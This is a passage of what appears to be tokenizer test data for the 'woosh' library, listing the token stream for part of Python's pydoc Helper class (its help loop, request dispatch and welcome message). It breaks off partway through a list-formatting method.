woosh.Token(woosh.NUMBER, '1', 2025, 37, 2025, 38),
woosh.Token(woosh.OP, ']', 2025, 38, 2025, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 2025, 39, 2026, 0),
woosh.Token(woosh.DEDENT, ' ', 2026, 0, 2026, 12),
woosh.Token(woosh.NAME, 'if', 2026, 12, 2026, 14),
woosh.Token(woosh.NAME, 'request', 2026, 15, 2026, 22),
woosh.Token(woosh.OP, '.', 2026, 22, 2026, 23),
woosh.Token(woosh.NAME, 'lower', 2026, 23, 2026, 28),
woosh.Token(woosh.OP, '(', 2026, 28, 2026, 29),
woosh.Token(woosh.OP, ')', 2026, 29, 2026, 30),
woosh.Token(woosh.NAME, 'in', 2026, 31, 2026, 33),
woosh.Token(woosh.OP, '(', 2026, 34, 2026, 35),
woosh.Token(woosh.STRING, "'q'", 2026, 35, 2026, 38),
woosh.Token(woosh.OP, ',', 2026, 38, 2026, 39),
woosh.Token(woosh.STRING, "'quit'", 2026, 40, 2026, 46),
woosh.Token(woosh.OP, ')', 2026, 46, 2026, 47),
woosh.Token(woosh.OP, ':', 2026, 47, 2026, 48),
woosh.Token(woosh.NAME, 'break', 2026, 49, 2026, 54),
woosh.Token(woosh.NEWLINE, '\r\n', 2026, 54, 2027, 0),
woosh.Token(woosh.NAME, 'if', 2027, 12, 2027, 14),
woosh.Token(woosh.NAME, 'request', 2027, 15, 2027, 22),
woosh.Token(woosh.OP, '==', 2027, 23, 2027, 25),
woosh.Token(woosh.STRING, "'help'", 2027, 26, 2027, 32),
woosh.Token(woosh.OP, ':', 2027, 32, 2027, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2027, 33, 2028, 0),
woosh.Token(woosh.INDENT, ' ', 2028, 0, 2028, 16),
woosh.Token(woosh.NAME, 'self', 2028, 16, 2028, 20),
woosh.Token(woosh.OP, '.', 2028, 20, 2028, 21),
woosh.Token(woosh.NAME, 'intro', 2028, 21, 2028, 26),
woosh.Token(woosh.OP, '(', 2028, 26, 2028, 27),
woosh.Token(woosh.OP, ')', 2028, 27, 2028, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2028, 28, 2029, 0),
woosh.Token(woosh.DEDENT, ' ', 2029, 0, 2029, 12),
woosh.Token(woosh.NAME, 'else', 2029, 12, 2029, 16),
woosh.Token(woosh.OP, ':', 2029, 16, 2029, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 2029, 17, 2030, 0),
woosh.Token(woosh.INDENT, ' ', 2030, 0, 2030, 16),
woosh.Token(woosh.NAME, 'self', 2030, 16, 2030, 20),
woosh.Token(woosh.OP, '.', 2030, 20, 2030, 21),
woosh.Token(woosh.NAME, 'help', 2030, 21, 2030, 25),
woosh.Token(woosh.OP, '(', 2030, 25, 2030, 26),
woosh.Token(woosh.NAME, 'request', 2030, 26, 2030, 33),
woosh.Token(woosh.OP, ')', 2030, 33, 2030, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 2030, 34, 2031, 0),
woosh.Token(woosh.DEDENT, ' ', 2032, 0, 2032, 4),
woosh.Token(woosh.DEDENT, '', 2032, 4, 2032, 4),
woosh.Token(woosh.DEDENT, '', 2032, 4, 2032, 4),
woosh.Token(woosh.NAME, 'def', 2032, 4, 2032, 7),
woosh.Token(woosh.NAME, 'getline', 2032, 8, 2032, 15),
woosh.Token(woosh.OP, '(', 2032, 15, 2032, 16),
woosh.Token(woosh.NAME, 'self', 2032, 16, 2032, 20),
woosh.Token(woosh.OP, ',', 2032, 20, 2032, 21),
woosh.Token(woosh.NAME, 'prompt', 2032, 22, 2032, 28),
woosh.Token(woosh.OP, ')', 2032, 28, 2032, 29),
woosh.Token(woosh.OP, ':', 2032, 29, 2032, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 2032, 30, 2033, 0),
woosh.Token(woosh.INDENT, ' ', 2033, 0, 2033, 8),
woosh.Token(woosh.STRING, '"""Read one line, using input() when appropriate."""', 2033, 8, 2033, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 2033, 60, 2034, 0),
woosh.Token(woosh.NAME, 'if', 2034, 8, 2034, 10),
woosh.Token(woosh.NAME, 'self', 2034, 11, 2034, 15),
woosh.Token(woosh.OP, '.', 2034, 15, 2034, 16),
woosh.Token(woosh.NAME, 'input', 2034, 16, 2034, 21),
woosh.Token(woosh.NAME, 'is', 2034, 22, 2034, 24),
woosh.Token(woosh.NAME, 'sys', 2034, 25, 2034, 28),
woosh.Token(woosh.OP, '.', 2034, 28, 2034, 29),
woosh.Token(woosh.NAME, 'stdin', 2034, 29, 2034, 34),
woosh.Token(woosh.OP, ':', 2034, 34, 2034, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2034, 35, 2035, 0),
woosh.Token(woosh.INDENT, ' ', 2035, 0, 2035, 12),
woosh.Token(woosh.NAME, 'return', 2035, 12, 2035, 18),
woosh.Token(woosh.NAME, 'input', 2035, 19, 2035, 24),
woosh.Token(woosh.OP, '(', 2035, 24, 2035, 25),
woosh.Token(woosh.NAME, 'prompt', 2035, 25, 2035, 31),
woosh.Token(woosh.OP, ')', 2035, 31, 2035, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 2035, 32, 2036, 0),
woosh.Token(woosh.DEDENT, ' ', 2036, 0, 2036, 8),
woosh.Token(woosh.NAME, 'else', 2036, 8, 2036, 12),
woosh.Token(woosh.OP, ':', 2036, 12, 2036, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 2036, 13, 2037, 0),
woosh.Token(woosh.INDENT, ' ', 2037, 0, 2037, 12),
woosh.Token(woosh.NAME, 'self', 2037, 12, 2037, 16),
woosh.Token(woosh.OP, '.', 2037, 16, 2037, 17),
woosh.Token(woosh.NAME, 'output', 2037, 17, 2037, 23),
woosh.Token(woosh.OP, '.', 2037, 23, 2037, 24),
woosh.Token(woosh.NAME, 'write', 2037, 24, 2037, 29),
woosh.Token(woosh.OP, '(', 2037, 29, 2037, 30),
woosh.Token(woosh.NAME, 'prompt', 2037, 30, 2037, 36),
woosh.Token(woosh.OP, ')', 2037, 36, 2037, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 2037, 37, 2038, 0),
woosh.Token(woosh.NAME, 'self', 2038, 12, 2038, 16),
woosh.Token(woosh.OP, '.', 2038, 16, 2038, 17),
woosh.Token(woosh.NAME, 'output', 2038, 17, 2038, 23),
woosh.Token(woosh.OP, '.', 2038, 23, 2038, 24),
woosh.Token(woosh.NAME, 'flush', 2038, 24, 2038, 29),
woosh.Token(woosh.OP, '(', 2038, 29, 2038, 30),
woosh.Token(woosh.OP, ')', 2038, 30, 2038, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 2038, 31, 2039, 0),
woosh.Token(woosh.NAME, 'return', 2039, 12, 2039, 18),
woosh.Token(woosh.NAME, 'self', 2039, 19, 2039, 23),
woosh.Token(woosh.OP, '.', 2039, 23, 2039, 24),
woosh.Token(woosh.NAME, 'input', 2039, 24, 2039, 29),
woosh.Token(woosh.OP, '.', 2039, 29, 2039, 30),
woosh.Token(woosh.NAME, 'readline', 2039, 30, 2039, 38),
woosh.Token(woosh.OP, '(', 2039, 38, 2039, 39),
woosh.Token(woosh.OP, ')', 2039, 39, 2039, 40),
woosh.Token(woosh.NEWLINE, '\r\n', 2039, 40, 2040, 0),
woosh.Token(woosh.DEDENT, ' ', 2041, 0, 2041, 4),
woosh.Token(woosh.DEDENT, '', 2041, 4, 2041, 4),
woosh.Token(woosh.NAME, 'def', 2041, 4, 2041, 7),
woosh.Token(woosh.NAME, 'help', 2041, 8, 2041, 12),
woosh.Token(woosh.OP, '(', 2041, 12, 2041, 13),
woosh.Token(woosh.NAME, 'self', 2041, 13, 2041, 17),
woosh.Token(woosh.OP, ',', 2041, 17, 2041, 18),
woosh.Token(woosh.NAME, 'request', 2041, 19, 2041, 26),
woosh.Token(woosh.OP, ')', 2041, 26, 2041, 27),
woosh.Token(woosh.OP, ':', 2041, 27, 2041, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2041, 28, 2042, 0),
woosh.Token(woosh.INDENT, ' ', 2042, 0, 2042, 8),
woosh.Token(woosh.NAME, 'if', 2042, 8, 2042, 10),
woosh.Token(woosh.NAME, 'type', 2042, 11, 2042, 15),
woosh.Token(woosh.OP, '(', 2042, 15, 2042, 16),
woosh.Token(woosh.NAME, 'request', 2042, 16, 2042, 23),
woosh.Token(woosh.OP, ')', 2042, 23, 2042, 24),
woosh.Token(woosh.NAME, 'is', 2042, 25, 2042, 27),
woosh.Token(woosh.NAME, 'type', 2042, 28, 2042, 32),
woosh.Token(woosh.OP, '(', 2042, 32, 2042, 33),
woosh.Token(woosh.STRING, "''", 2042, 33, 2042, 35),
woosh.Token(woosh.OP, ')', 2042, 35, 2042, 36),
woosh.Token(woosh.OP, ':', 2042, 36, 2042, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 2042, 37, 2043, 0),
woosh.Token(woosh.INDENT, ' ', 2043, 0, 2043, 12),
woosh.Token(woosh.NAME, 'request', 2043, 12, 2043, 19),
woosh.Token(woosh.OP, '=', 2043, 20, 2043, 21),
woosh.Token(woosh.NAME, 'request', 2043, 22, 2043, 29),
woosh.Token(woosh.OP, '.', 2043, 29, 2043, 30),
woosh.Token(woosh.NAME, 'strip', 2043, 30, 2043, 35),
woosh.Token(woosh.OP, '(', 2043, 35, 2043, 36),
woosh.Token(woosh.OP, ')', 2043, 36, 2043, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 2043, 37, 2044, 0),
woosh.Token(woosh.NAME, 'if', 2044, 12, 2044, 14),
woosh.Token(woosh.NAME, 'request', 2044, 15, 2044, 22),
woosh.Token(woosh.OP, '==', 2044, 23, 2044, 25),
woosh.Token(woosh.STRING, "'keywords'", 2044, 26, 2044, 36),
woosh.Token(woosh.OP, ':', 2044, 36, 2044, 37),
woosh.Token(woosh.NAME, 'self', 2044, 38, 2044, 42),
woosh.Token(woosh.OP, '.', 2044, 42, 2044, 43),
woosh.Token(woosh.NAME, 'listkeywords', 2044, 43, 2044, 55),
woosh.Token(woosh.OP, '(', 2044, 55, 2044, 56),
woosh.Token(woosh.OP, ')', 2044, 56, 2044, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 2044, 57, 2045, 0),
woosh.Token(woosh.NAME, 'elif', 2045, 12, 2045, 16),
woosh.Token(woosh.NAME, 'request', 2045, 17, 2045, 24),
woosh.Token(woosh.OP, '==', 2045, 25, 2045, 27),
woosh.Token(woosh.STRING, "'symbols'", 2045, 28, 2045, 37),
woosh.Token(woosh.OP, ':', 2045, 37, 2045, 38),
woosh.Token(woosh.NAME, 'self', 2045, 39, 2045, 43),
woosh.Token(woosh.OP, '.', 2045, 43, 2045, 44),
woosh.Token(woosh.NAME, 'listsymbols', 2045, 44, 2045, 55),
woosh.Token(woosh.OP, '(', 2045, 55, 2045, 56),
woosh.Token(woosh.OP, ')', 2045, 56, 2045, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 2045, 57, 2046, 0),
woosh.Token(woosh.NAME, 'elif', 2046, 12, 2046, 16),
woosh.Token(woosh.NAME, 'request', 2046, 17, 2046, 24),
woosh.Token(woosh.OP, '==', 2046, 25, 2046, 27),
woosh.Token(woosh.STRING, "'topics'", 2046, 28, 2046, 36),
woosh.Token(woosh.OP, ':', 2046, 36, 2046, 37),
woosh.Token(woosh.NAME, 'self', 2046, 38, 2046, 42),
woosh.Token(woosh.OP, '.', 2046, 42, 2046, 43),
woosh.Token(woosh.NAME, 'listtopics', 2046, 43, 2046, 53),
woosh.Token(woosh.OP, '(', 2046, 53, 2046, 54),
woosh.Token(woosh.OP, ')', 2046, 54, 2046, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 2046, 55, 2047, 0),
woosh.Token(woosh.NAME, 'elif', 2047, 12, 2047, 16),
woosh.Token(woosh.NAME, 'request', 2047, 17, 2047, 24),
woosh.Token(woosh.OP, '==', 2047, 25, 2047, 27),
woosh.Token(woosh.STRING, "'modules'", 2047, 28, 2047, 37),
woosh.Token(woosh.OP, ':', 2047, 37, 2047, 38),
woosh.Token(woosh.NAME, 'self', 2047, 39, 2047, 43),
woosh.Token(woosh.OP, '.', 2047, 43, 2047, 44),
woosh.Token(woosh.NAME, 'listmodules', 2047, 44, 2047, 55),
woosh.Token(woosh.OP, '(', 2047, 55, 2047, 56),
woosh.Token(woosh.OP, ')', 2047, 56, 2047, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 2047, 57, 2048, 0),
woosh.Token(woosh.NAME, 'elif', 2048, 12, 2048, 16),
woosh.Token(woosh.NAME, 'request', 2048, 17, 2048, 24),
woosh.Token(woosh.OP, '[', 2048, 24, 2048, 25),
woosh.Token(woosh.OP, ':', 2048, 25, 2048, 26),
woosh.Token(woosh.NUMBER, '8', 2048, 26, 2048, 27),
woosh.Token(woosh.OP, ']', 2048, 27, 2048, 28),
woosh.Token(woosh.OP, '==', 2048, 29, 2048, 31),
woosh.Token(woosh.STRING, "'modules '", 2048, 32, 2048, 42),
woosh.Token(woosh.OP, ':', 2048, 42, 2048, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 2048, 43, 2049, 0),
woosh.Token(woosh.INDENT, ' ', 2049, 0, 2049, 16),
woosh.Token(woosh.NAME, 'self', 2049, 16, 2049, 20),
woosh.Token(woosh.OP, '.', 2049, 20, 2049, 21),
woosh.Token(woosh.NAME, 'listmodules', 2049, 21, 2049, 32),
woosh.Token(woosh.OP, '(', 2049, 32, 2049, 33),
woosh.Token(woosh.NAME, 'request', 2049, 33, 2049, 40),
woosh.Token(woosh.OP, '.', 2049, 40, 2049, 41),
woosh.Token(woosh.NAME, 'split', 2049, 41, 2049, 46),
woosh.Token(woosh.OP, '(', 2049, 46, 2049, 47),
woosh.Token(woosh.OP, ')', 2049, 47, 2049, 48),
woosh.Token(woosh.OP, '[', 2049, 48, 2049, 49),
woosh.Token(woosh.NUMBER, '1', 2049, 49, 2049, 50),
woosh.Token(woosh.OP, ']', 2049, 50, 2049, 51),
woosh.Token(woosh.OP, ')', 2049, 51, 2049, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 2049, 52, 2050, 0),
woosh.Token(woosh.DEDENT, ' ', 2050, 0, 2050, 12),
woosh.Token(woosh.NAME, 'elif', 2050, 12, 2050, 16),
woosh.Token(woosh.NAME, 'request', 2050, 17, 2050, 24),
woosh.Token(woosh.NAME, 'in', 2050, 25, 2050, 27),
woosh.Token(woosh.NAME, 'self', 2050, 28, 2050, 32),
woosh.Token(woosh.OP, '.', 2050, 32, 2050, 33),
woosh.Token(woosh.NAME, 'symbols', 2050, 33, 2050, 40),
woosh.Token(woosh.OP, ':', 2050, 40, 2050, 41),
woosh.Token(woosh.NAME, 'self', 2050, 42, 2050, 46),
woosh.Token(woosh.OP, '.', 2050, 46, 2050, 47),
woosh.Token(woosh.NAME, 'showsymbol', 2050, 47, 2050, 57),
woosh.Token(woosh.OP, '(', 2050, 57, 2050, 58),
woosh.Token(woosh.NAME, 'request', 2050, 58, 2050, 65),
woosh.Token(woosh.OP, ')', 2050, 65, 2050, 66),
woosh.Token(woosh.NEWLINE, '\r\n', 2050, 66, 2051, 0),
woosh.Token(woosh.NAME, 'elif', 2051, 12, 2051, 16),
woosh.Token(woosh.NAME, 'request', 2051, 17, 2051, 24),
woosh.Token(woosh.NAME, 'in', 2051, 25, 2051, 27),
woosh.Token(woosh.OP, '[', 2051, 28, 2051, 29),
woosh.Token(woosh.STRING, "'True'", 2051, 29, 2051, 35),
woosh.Token(woosh.OP, ',', 2051, 35, 2051, 36),
woosh.Token(woosh.STRING, "'False'", 2051, 37, 2051, 44),
woosh.Token(woosh.OP, ',', 2051, 44, 2051, 45),
woosh.Token(woosh.STRING, "'None'", 2051, 46, 2051, 52),
woosh.Token(woosh.OP, ']', 2051, 52, 2051, 53),
woosh.Token(woosh.OP, ':', 2051, 53, 2051, 54),
woosh.Token(woosh.NEWLINE, '\r\n', 2051, 54, 2052, 0),
woosh.Token(woosh.COMMENT, '# special case these keywords since they are objects too', 2052, 16, 2052, 72),
woosh.Token(woosh.INDENT, ' ', 2053, 0, 2053, 16),
woosh.Token(woosh.NAME, 'doc', 2053, 16, 2053, 19),
woosh.Token(woosh.OP, '(', 2053, 19, 2053, 20),
woosh.Token(woosh.NAME, 'eval', 2053, 20, 2053, 24),
woosh.Token(woosh.OP, '(', 2053, 24, 2053, 25),
woosh.Token(woosh.NAME, 'request', 2053, 25, 2053, 32),
woosh.Token(woosh.OP, ')', 2053, 32, 2053, 33),
woosh.Token(woosh.OP, ',', 2053, 33, 2053, 34),
woosh.Token(woosh.STRING, "'Help on %s:'", 2053, 35, 2053, 48),
woosh.Token(woosh.OP, ')', 2053, 48, 2053, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 2053, 49, 2054, 0),
woosh.Token(woosh.DEDENT, ' ', 2054, 0, 2054, 12),
woosh.Token(woosh.NAME, 'elif', 2054, 12, 2054, 16),
woosh.Token(woosh.NAME, 'request', 2054, 17, 2054, 24),
woosh.Token(woosh.NAME, 'in', 2054, 25, 2054, 27),
woosh.Token(woosh.NAME, 'self', 2054, 28, 2054, 32),
woosh.Token(woosh.OP, '.', 2054, 32, 2054, 33),
woosh.Token(woosh.NAME, 'keywords', 2054, 33, 2054, 41),
woosh.Token(woosh.OP, ':', 2054, 41, 2054, 42),
woosh.Token(woosh.NAME, 'self', 2054, 43, 2054, 47),
woosh.Token(woosh.OP, '.', 2054, 47, 2054, 48),
woosh.Token(woosh.NAME, 'showtopic', 2054, 48, 2054, 57),
woosh.Token(woosh.OP, '(', 2054, 57, 2054, 58),
woosh.Token(woosh.NAME, 'request', 2054, 58, 2054, 65),
woosh.Token(woosh.OP, ')', 2054, 65, 2054, 66),
woosh.Token(woosh.NEWLINE, '\r\n', 2054, 66, 2055, 0),
woosh.Token(woosh.NAME, 'elif', 2055, 12, 2055, 16),
woosh.Token(woosh.NAME, 'request', 2055, 17, 2055, 24),
woosh.Token(woosh.NAME, 'in', 2055, 25, 2055, 27),
woosh.Token(woosh.NAME, 'self', 2055, 28, 2055, 32),
woosh.Token(woosh.OP, '.', 2055, 32, 2055, 33),
woosh.Token(woosh.NAME, 'topics', 2055, 33, 2055, 39),
woosh.Token(woosh.OP, ':', 2055, 39, 2055, 40),
woosh.Token(woosh.NAME, 'self', 2055, 41, 2055, 45),
woosh.Token(woosh.OP, '.', 2055, 45, 2055, 46),
woosh.Token(woosh.NAME, 'showtopic', 2055, 46, 2055, 55),
woosh.Token(woosh.OP, '(', 2055, 55, 2055, 56),
woosh.Token(woosh.NAME, 'request', 2055, 56, 2055, 63),
woosh.Token(woosh.OP, ')', 2055, 63, 2055, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 2055, 64, 2056, 0),
woosh.Token(woosh.NAME, 'elif', 2056, 12, 2056, 16),
woosh.Token(woosh.NAME, 'request', 2056, 17, 2056, 24),
woosh.Token(woosh.OP, ':', 2056, 24, 2056, 25),
woosh.Token(woosh.NAME, 'doc', 2056, 26, 2056, 29),
woosh.Token(woosh.OP, '(', 2056, 29, 2056, 30),
woosh.Token(woosh.NAME, 'request', 2056, 30, 2056, 37),
woosh.Token(woosh.OP, ',', 2056, 37, 2056, 38),
woosh.Token(woosh.STRING, "'Help on %s:'", 2056, 39, 2056, 52),
woosh.Token(woosh.OP, ',', 2056, 52, 2056, 53),
woosh.Token(woosh.NAME, 'output', 2056, 54, 2056, 60),
woosh.Token(woosh.OP, '=', 2056, 60, 2056, 61),
woosh.Token(woosh.NAME, 'self', 2056, 61, 2056, 65),
woosh.Token(woosh.OP, '.', 2056, 65, 2056, 66),
woosh.Token(woosh.NAME, '_output', 2056, 66, 2056, 73),
woosh.Token(woosh.OP, ')', 2056, 73, 2056, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 2056, 74, 2057, 0),
woosh.Token(woosh.NAME, 'else', 2057, 12, 2057, 16),
woosh.Token(woosh.OP, ':', 2057, 16, 2057, 17),
woosh.Token(woosh.NAME, 'doc', 2057, 18, 2057, 21),
woosh.Token(woosh.OP, '(', 2057, 21, 2057, 22),
woosh.Token(woosh.NAME, 'str', 2057, 22, 2057, 25),
woosh.Token(woosh.OP, ',', 2057, 25, 2057, 26),
woosh.Token(woosh.STRING, "'Help on %s:'", 2057, 27, 2057, 40),
woosh.Token(woosh.OP, ',', 2057, 40, 2057, 41),
woosh.Token(woosh.NAME, 'output', 2057, 42, 2057, 48),
woosh.Token(woosh.OP, '=', 2057, 48, 2057, 49),
woosh.Token(woosh.NAME, 'self', 2057, 49, 2057, 53),
woosh.Token(woosh.OP, '.', 2057, 53, 2057, 54),
woosh.Token(woosh.NAME, '_output', 2057, 54, 2057, 61),
woosh.Token(woosh.OP, ')', 2057, 61, 2057, 62),
woosh.Token(woosh.NEWLINE, '\r\n', 2057, 62, 2058, 0),
woosh.Token(woosh.DEDENT, ' ', 2058, 0, 2058, 8),
woosh.Token(woosh.NAME, 'elif', 2058, 8, 2058, 12),
woosh.Token(woosh.NAME, 'isinstance', 2058, 13, 2058, 23),
woosh.Token(woosh.OP, '(', 2058, 23, 2058, 24),
woosh.Token(woosh.NAME, 'request', 2058, 24, 2058, 31),
woosh.Token(woosh.OP, ',', 2058, 31, 2058, 32),
woosh.Token(woosh.NAME, 'Helper', 2058, 33, 2058, 39),
woosh.Token(woosh.OP, ')', 2058, 39, 2058, 40),
woosh.Token(woosh.OP, ':', 2058, 40, 2058, 41),
woosh.Token(woosh.NAME, 'self', 2058, 42, 2058, 46),
woosh.Token(woosh.OP, '(', 2058, 46, 2058, 47),
woosh.Token(woosh.OP, ')', 2058, 47, 2058, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 2058, 48, 2059, 0),
woosh.Token(woosh.NAME, 'else', 2059, 8, 2059, 12),
woosh.Token(woosh.OP, ':', 2059, 12, 2059, 13),
woosh.Token(woosh.NAME, 'doc', 2059, 14, 2059, 17),
woosh.Token(woosh.OP, '(', 2059, 17, 2059, 18),
woosh.Token(woosh.NAME, 'request', 2059, 18, 2059, 25),
woosh.Token(woosh.OP, ',', 2059, 25, 2059, 26),
woosh.Token(woosh.STRING, "'Help on %s:'", 2059, 27, 2059, 40),
woosh.Token(woosh.OP, ',', 2059, 40, 2059, 41),
woosh.Token(woosh.NAME, 'output', 2059, 42, 2059, 48),
woosh.Token(woosh.OP, '=', 2059, 48, 2059, 49),
woosh.Token(woosh.NAME, 'self', 2059, 49, 2059, 53),
woosh.Token(woosh.OP, '.', 2059, 53, 2059, 54),
woosh.Token(woosh.NAME, '_output', 2059, 54, 2059, 61),
woosh.Token(woosh.OP, ')', 2059, 61, 2059, 62),
woosh.Token(woosh.NEWLINE, '\r\n', 2059, 62, 2060, 0),
woosh.Token(woosh.NAME, 'self', 2060, 8, 2060, 12),
woosh.Token(woosh.OP, '.', 2060, 12, 2060, 13),
woosh.Token(woosh.NAME, 'output', 2060, 13, 2060, 19),
woosh.Token(woosh.OP, '.', 2060, 19, 2060, 20),
woosh.Token(woosh.NAME, 'write', 2060, 20, 2060, 25),
woosh.Token(woosh.OP, '(', 2060, 25, 2060, 26),
woosh.Token(woosh.STRING, "'\\n'", 2060, 26, 2060, 30),
woosh.Token(woosh.OP, ')', 2060, 30, 2060, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 2060, 31, 2061, 0),
woosh.Token(woosh.DEDENT, ' ', 2062, 0, 2062, 4),
woosh.Token(woosh.NAME, 'def', 2062, 4, 2062, 7),
woosh.Token(woosh.NAME, 'intro', 2062, 8, 2062, 13),
woosh.Token(woosh.OP, '(', 2062, 13, 2062, 14),
woosh.Token(woosh.NAME, 'self', 2062, 14, 2062, 18),
woosh.Token(woosh.OP, ')', 2062, 18, 2062, 19),
woosh.Token(woosh.OP, ':', 2062, 19, 2062, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 2062, 20, 2063, 0),
woosh.Token(woosh.INDENT, ' ', 2063, 0, 2063, 8),
woosh.Token(woosh.NAME, 'self', 2063, 8, 2063, 12),
woosh.Token(woosh.OP, '.', 2063, 12, 2063, 13),
woosh.Token(woosh.NAME, 'output', 2063, 13, 2063, 19),
woosh.Token(woosh.OP, '.', 2063, 19, 2063, 20),
woosh.Token(woosh.NAME, 'write', 2063, 20, 2063, 25),
woosh.Token(woosh.OP, '(', 2063, 25, 2063, 26),
woosh.Token(woosh.STRING, '\'\'\'\r\nWelcome to Python {0}\'s help utility!\r\n\r\nIf this is your first time using Python, you should definitely check out\r\nthe tutorial on the Internet at https://docs.python.org/{0}/tutorial/.\r\n\r\nEnter the name of any module, keyword, or topic to get help on writing\r\nPython programs and using Python modules. To quit this help utility and\r\nreturn to the interpreter, just type "quit".\r\n\r\nTo get a list of available modules, keywords, symbols, or topics, type\r\n"modules", "keywords", "symbols", or "topics". Each module also comes\r\nwith a one-line summary of what it does; to list the modules whose name\r\nor summary contain a given string such as "spam", type "modules spam".\r\n\'\'\'', 2063, 26, 2077, 3),
woosh.Token(woosh.OP, '.', 2077, 3, 2077, 4),
woosh.Token(woosh.NAME, 'format', 2077, 4, 2077, 10),
woosh.Token(woosh.OP, '(', 2077, 10, 2077, 11),
woosh.Token(woosh.STRING, "'%d.%d'", 2077, 11, 2077, 18),
woosh.Token(woosh.OP, '%', 2077, 19, 2077, 20),
woosh.Token(woosh.NAME, 'sys', 2077, 21, 2077, 24),
woosh.Token(woosh.OP, '.', 2077, 24, 2077, 25),
woosh.Token(woosh.NAME, 'version_info', 2077, 25, 2077, 37),
woosh.Token(woosh.OP, '[', 2077, 37, 2077, 38),
woosh.Token(woosh.OP, ':', 2077, 38, 2077, 39),
woosh.Token(woosh.NUMBER, '2', 2077, 39, 2077, 40),
woosh.Token(woosh.OP, ']', 2077, 40, 2077, 41),
woosh.Token(woosh.OP, ')', 2077, 41, 2077, 42),
woosh.Token(woosh.OP, ')', 2077, 42, 2077, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 2077, 43, 2078, 0),
woosh.Token(woosh.DEDENT, ' ', 2079, 0, 2079, 4),
woosh.Token(woosh.NAME, 'def', 2079, 4, 2079, 7),
woosh.Token(woosh.NAME, 'list', 2079, 8, 2079, 12),
woosh.Token(woosh.OP, '(', 2079, 12, 2079, 13),
woosh.Token(woosh.NAME, 'self', 2079, 13, 2079, 17),
woosh.Token(woosh.OP, ',', 2079, 17, 2079, 18),
woosh.Token(woosh.NAME, 'items', 2079, 19, 2079, 24),
woosh.Token(woosh.OP, ',', 2079, 24, 2079, 25),
woosh.Token(woosh.NAME, 'columns', 2079, 26, 2079, 33),
woosh.Token(woosh.OP, '=', 2079, 33, 2079, 34),
woosh.Token(woosh.NUMBER, '4', 2079, 34, 2079, 35),
woosh.Token(woosh.OP, ',', 2079, 35, 2079, 36),
woosh.Token(woosh.NAME, 'width', 2079, 37, 2079, 42),
woosh.Token(woosh.OP, '=', 2079, 42, 2079, 43),
woosh.Token(woosh.NUMBER, '80', 2079, 43, 2079, 45),
woosh.Token(woosh.OP, ')', 2079, 45, 2079, 46),
woosh.Token(woosh.OP, ':', 2079, 46, 2079, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 2079, 47, 2080, 0),
woosh.Token(woosh.INDENT, ' ', 2080, 0, 2080, 8),
woosh.Token(woosh.NAME, 'items', 2080, 8, 2080, 13),
woosh.Token(woosh.OP, '=', 2080, 14, 2080, 15),
woosh.Token(woosh.NAME, 'list', 2080, 16, 2080, 20),
woosh.Token(woosh.OP, '(', 2080, 20, 2080, 21),
woosh.Token(woosh.NAME, 'sorted', 2080, 21, 2080, 27),
woosh.Token(woosh.OP, '(', 2080, 27, 2080, 28),
woosh.Token(woosh.NAME, 'items', 2080, 28, 2080, 33),
woosh.Token(woosh.OP, ')', 2080, 33, 2080, 34),
woosh.Token(woosh.OP, ')', 2080, 34, 2080, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2080, 35, 2081, 0),
woosh.Token(woosh.NAME, 'colw', 2081, 8, 2081, 12),
woosh.Token(woosh.OP, '=', 2081, 13, 2081, 14),
woosh.Token(woosh.NAME, 'width', 2081, 15, 2081, 20),
woosh.Token(woosh.OP, '//', 2081, 21, 2081, 23),
woosh.Token(woosh.NAME, 'columns', 2081, 24, 2081, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 2081, 31, 2082, 0),
woosh.Token(woosh.NAME, 'rows', 2082, 8, 2082, 12),
woosh.Token(woosh.OP, '=', 2082, 13, 2082, 14),
woosh.Token(woosh.OP, '(', 2082, 15, 2082, 16),
woosh.Token(woosh.NAME, 'len', 2082, 16, 2082, 19),
woosh.Token(woosh.OP, '(', 2082, 19, 2082, 20),
woosh.Token(woosh.NAME, 'items', 2082, 20, 2082, 25),
woosh.Token(woosh.OP, ')', 2082, 25, 2082, 26),
woosh.Token(woosh.OP, '+', 2082, 27, 2082, 28),
woosh.Token(woosh.NAME, 'columns', 2082, 29, 2082, 36),
woosh.Token(woosh.OP, '-', 2082, 37, 2082, 38),
woosh.Token(woosh.NUMBER, '1', 2082, 39, 2082, 40),
woosh.Token(woosh.OP, ')', 2082, 40, 2082, 41),
woosh.Token(woosh.OP, '//', 2082, 42, 2082, 44),
woosh.Token(woosh.NAME, 'columns', 2082, 45, 2082, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 2082, 52, 2083, 0),
woosh.Token(woosh.NAME, 'for', 2083, 8, 2083, 11),
woosh.Token(woosh.NAME, 'row', 2083, 12, 2083, 15),
woosh.Token(woosh.NAME, 'in', 2083, 16, 2083, 18),
woosh.Token(woosh.NAME, 'range', 2083, 19, 2083, 24),
woosh.Token(woosh.OP, '(', 2083, 24, 2083, 25),
woosh.Token(woosh.NAME, 'rows', 2083, 25, 2083, 29),
